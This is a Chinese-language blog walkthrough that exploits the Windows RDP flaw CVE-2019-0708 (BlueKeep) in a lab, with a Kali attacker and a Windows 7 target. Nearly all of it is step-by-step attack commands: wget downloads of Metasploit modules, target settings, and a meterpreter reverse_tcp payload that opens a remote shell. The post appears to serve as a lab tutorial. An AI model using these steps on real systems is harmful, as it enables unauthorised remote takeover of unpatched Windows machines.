RDP远程桌面执行漏洞 CVE-2019-0708
2019-09-19 本文已影响0人
CSeroad
前言
CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。
漏洞利用
更新metasploit
apt update; apt install metasploit-framework
安装并替换四个模块
rdp.rb、rdp_scanner.rb、cve_2019_0708_bluekeep_rce.rb、cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
安装后metasploit模块为
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
image.png
/usr/share/metasploit-framework/modules/exploits/windows/rdp
image.png
攻击机kali(192.168.203.128)
靶机windows7 (192.168.203.130)
启动msf后search cve-2019-0708
image.png
设置RHOST(目标IP)、LHOST(本地IP)、PAYLOAD
set payload windows/x64/meterpreter/reverse_tcp
还需要选择target为物理机还是其他虚拟机
image.png
这里选择VMWare
image.png
run即可
image.png
